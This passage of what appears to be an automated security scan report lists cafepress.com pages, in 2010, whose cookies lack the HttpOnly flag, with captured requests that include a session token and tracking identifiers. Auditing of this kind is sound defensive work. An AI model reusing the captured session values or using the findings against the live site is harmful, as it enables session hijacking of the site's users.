__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 58794
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.70. http://www.cafepress.com/make/holiday-invitations
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/holiday-invitations
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/holiday-invitations HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 55521
Date: Sun, 26 Dec 2010 13:47:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.71. http://www.cafepress.com/make/holiday-photo-cards
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/holiday-photo-cards
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/holiday-photo-cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 58720
Date: Sun, 26 Dec 2010 13:47:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.72. http://www.cafepress.com/make/makeacard.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/makeacard.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/makeacard.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: /cp/bing/errorpage.html?aspxerrorpath=/make/makeacard.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Content-Length: 189
Date: Sun, 26 Dec 2010 13:48:17 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fcp%2fbing%2ferrorpage.html%3faspxerrorpath%3d%2fmake%2fmakeacard.aspx">here</a>.</h2> </body></html>
3.73. http://www.cafepress.com/make/personalized-gifts
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/personalized-gifts
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 71867 Date: Sun, 26 Dec 2010 13:47:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.74. http://www.cafepress.com/make/personalized-ornaments
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/personalized-ornaments
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 54240 Date: Sun, 26 Dec 2010 13:47:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54240 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.75. http://www.cafepress.com/sk/TheGamingApe
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /sk/TheGamingApe
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 174544 Date: Sun, 26 Dec 2010 13:48:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174544 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.76. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
